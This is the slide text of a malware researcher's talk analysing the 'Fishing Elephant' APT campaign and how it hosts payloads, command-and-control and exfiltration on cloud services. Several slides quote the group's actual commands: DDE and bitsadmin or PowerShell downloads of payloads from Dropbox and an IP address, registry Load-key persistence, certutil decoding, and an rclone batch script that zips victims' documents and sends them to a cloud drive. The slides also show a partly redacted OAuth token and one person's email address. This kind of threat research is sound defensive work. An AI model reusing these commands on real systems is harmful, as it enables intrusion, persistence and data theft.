Fishing Elephant, or how to build cloud based APT $ whois mak - - PowerPoint PPT Presentation

fishing elephant or how to build cloud based apt whois mak
SMART_READER_LITE
LIVE PREVIEW

Fishing Elephant, or how to build cloud based APT $ whois mak - - PowerPoint PPT Presentation

Apr 30, 2023 236 likes •687 views

Fishing Elephant, or how to build cloud based APT $ whois mak Independent Malware Researcher / Founder of MalwareLab.pl Dragon Sector CTF RE/Exploit dev Automatization / Formal methods @maciekkotowicz

slide-1
SLIDE 1

Fishing Elephant,

  • r how to build cloud based APT
slide-2
SLIDE 2

$ whois mak

  • Independent Malware Researcher / Founder of MalwareLab.pl
  • Dragon Sector CTF
  • RE/Exploit dev
  • Automatization / Formal methods
  • @maciekkotowicz
  • mak@malwarelab.pl
  • Principal Malware Researcher @ CERT.pl
  • Senior Researcher @ Kaspersky GReAT
slide-3
SLIDE 3

How to build APT-like attack

slide-4
SLIDE 4
slide-5
SLIDE 5

Payload hosted

  • n cloud-storage

services Exfiltration to cloud-storage providers

slide-6
SLIDE 6
slide-7
SLIDE 7

Payload hosted

  • n cloud-storage

services Intermediate stages run on PaaS platforms Exfiltration to cloud-storage providers C2 hosted on PaaS or free hosting platforms

slide-8
SLIDE 8
slide-9
SLIDE 9

Open source malware Payload hosted

  • n cloud-storage

services Intermediate stages run on PaaS platforms Exfiltration to cloud-storage providers Open source exploits/vulnerabilities C2 hosted on PaaS or free hosting platforms

slide-10
SLIDE 10
slide-11
SLIDE 11

How Fishing Elephant did it

slide-12
SLIDE 12
slide-13
SLIDE 13
slide-14
SLIDE 14
slide-15
SLIDE 15
slide-16
SLIDE 16
slide-17
SLIDE 17

Campaign Summary

  • Spear phishing emails with a link to fake Google Drive
  • Doc’s look-alike app hosted on heroku dropping malicious hta
  • Decoy image hosted on Google Drive opened via launching a browser
  • Payload link hinder via url-shortening service bitly and others
  • Payload hosted on cloud storage service (dropbox, yandex

disk,asuswebstorage)

slide-18
SLIDE 18
slide-19
SLIDE 19

SET e ""

REF c REF d REF e DDE C:\Programs\Microsoft\Office\MSWord .exe\..\..\..\..\Windows \System32\cmd.exe SET c "" "cmd /c bitsadmin /transfer data /priority high https://www.dropbox.com/s/pgm729t85j5h1uq/o.txt?dl=1 C:\Users\Public\o.hta & start C:\Users\Public\o.hta" SET d ""

slide-20
SLIDE 20

<script language="VBScript"> window.moveTo -3000, -3000 Dim MaCommande,Ws,Ret Set Ws = CreateObject("wscript.Shell") Ws.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ", "C:\Users\Public\hplogs.exe ", "REG_SZ" MaCommande = "cmd /c bitsadmin /transfer data /priority high http://185.163.111.90/D3e71ffad76f3d44d6ae482205f3a 2c94/hplogs.exe C:\Users\Public\hplogs.exe " Ret = Ws.run(MaCommande,0,True) window.close()

slide-21
SLIDE 21
slide-22
SLIDE 22

Campaign Summary

  • Spear phishing emails with references to internal documents, and current

events

  • DDE abused to fetch second stage scripts from Dropbox
  • No decoy documents, just blank page
  • Off the shelf tools (bitsadmin) used for downloading
  • Payload link hinder via url-shortening service bitly and others
slide-23
SLIDE 23

Newest modifications

  • Geofencing for first stage hosted on heroku

○ If check failed - redirect to https://www.dropbox[.]com/s/apvco1h77036wgb/os.txt?dl=1 ○ Else redirect to batch code also hosted on dropbox

  • certutil used for decoding final payload

cmd /b START /MIN /c powershell -ep -nop -w hidden (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T").DownloadFile('ht'+'tps://www.dropbox.com/s/tjr1jx12qnlz425/b-os.txt?dl=1','C:\Windows\Tasks\certs.txt') certutil -decode C:\Windows\Tasks\certs.txt C:\Windows\Tasks\dnplqs.exe ICACLS "C:\Windows\Tasks\dnplqs.exe" /grant "%computername%":F REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /d "C:\Windows\Tasks\dnplqs.exe"

slide-24
SLIDE 24

Open Source Malware

slide-25
SLIDE 25
slide-26
SLIDE 26
slide-27
SLIDE 27

Modded Ares

  • Upload file
  • Download file
  • Zipping file or directory
  • Change directory
  • Execute cmd.exe commands
slide-28
SLIDE 28

Open Source Open Source Leaked/Cracked

slide-29
SLIDE 29

Exfiltration

slide-30
SLIDE 30

powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/[redacted]/rclone.conf?dl=1','rclone.conf'), (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/fwo3ec2gfgddkr1/system.exe?dl=1','system. exe') , (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/3gkzclfdrgzslkp/tmp.exe?dl=1','tmp.exe');

slide-31
SLIDE 31
  • system.exe

○ rclone.exe ○ 9b363e52d7c1a96a59964e5ebad6ed8

  • tmp.exe

○ 7z.exe ○ 5e0cfb5f9d4cc24c92c7ebb184d6c9b1

slide-32
SLIDE 32

Rclone is a command line program to manage files on cloud storage.

[update] type = drive client_id = client_secret = service_account_file = token = {"access_token":"ya29.GlscBYp[redacted]qAVx0sKO4RE5wUCtvx3FLG_nNJ9GQa4liLz7Kxr sXpYzmbRfVO","token_type":"Bearer","refresh_token":"1/r[redacted]Ve4ZdWOqem_eA2ho", "expiry":"2017-12-08T15:08:21.9850685+05:30"} team_drive =

slide-33
SLIDE 33

for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p C:\Users\PATOMD~1 /s /m *%%G -d 13-05-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_C_%date:/=.% %time::=.%.zip @path" for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p G: /s /m *%%G -d 01-01-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_G_%date:/=.% %time::=.%.zip @path" cd %appdata% system move --delete-after C:\Users\Public\Window\ update:BD del /q/f/s %TEMP%\*.* del /q/s/f C:\Windows\Tasks\*.txt

slide-34
SLIDE 34

Pros of cloud-based/OSS solutions

slide-35
SLIDE 35
  • Mostly free, easy to set up, few clicks and you have a working hosting
  • Hard to figure out from outside who uses a service
  • Easy, scriptable access to your assets
  • Can kiss code-based attribution goodby
  • Good luck getting a provider to take down an account (with some notable

exception such as heroku)

slide-36
SLIDE 36

Cons of cloud-based/OSS solutions

slide-37
SLIDE 37
  • Metadata, a lot of metadata
slide-38
SLIDE 38
  • Metadata, a lot of metadata

... { "kind": "drive#permission", "etag": "\"1Jn1MfFS5e4oWHHjbcjtFXlj934\"", "id": "10242864118326064187", "selfLink": "https://www.googleapis.com/drive/v2beta/files/1MRlT8uoUaVI TWlC_5qsWfu98vuiEq6pC/permissions/10242864118326064 187", "userId": "105520765509160710619", "name": "Bushra Fatima", "emailAddress": "fatima.bushra1990@gmail.com", "domain": "gmail.com", "role": "owner", "type": "user", } ...

slide-39
SLIDE 39
  • Metadata, a lot of metadata
  • API keys needed for accessing resources
slide-40
SLIDE 40
  • Metadata, a lot of metadata
  • API keys needed for accessing resources
  • Cloud operators have a different visibility

into your stuff than typical hosters

slide-41
SLIDE 41

Summary

slide-42
SLIDE 42

Fishing Elephant summary

  • Relatively new actor (since at least 2017)
  • Not sophisticated

○ Lack of in-house developed tools ○ However uses interesting methods to glue attacks together

  • Heavy use of PaaS and cloud storage
  • Relays on open source tools
  • Targets South-East part of Asia
  • Probably relays on phishing to get access to email servers
  • Hard to catch ;/
slide-43
SLIDE 43

Cloud-relaying attacks, summary

Pros

  • Easy to setup and maintain
  • Hard to take down
  • Hard to detect
  • Hard to attribute

Cons

  • Leaves a lot of metadata
  • Access to accounts shared with victims and researches
slide-44
SLIDE 44

Q & A?

@malwarelabpl contact@malwarelab.pl @maciekkotowicz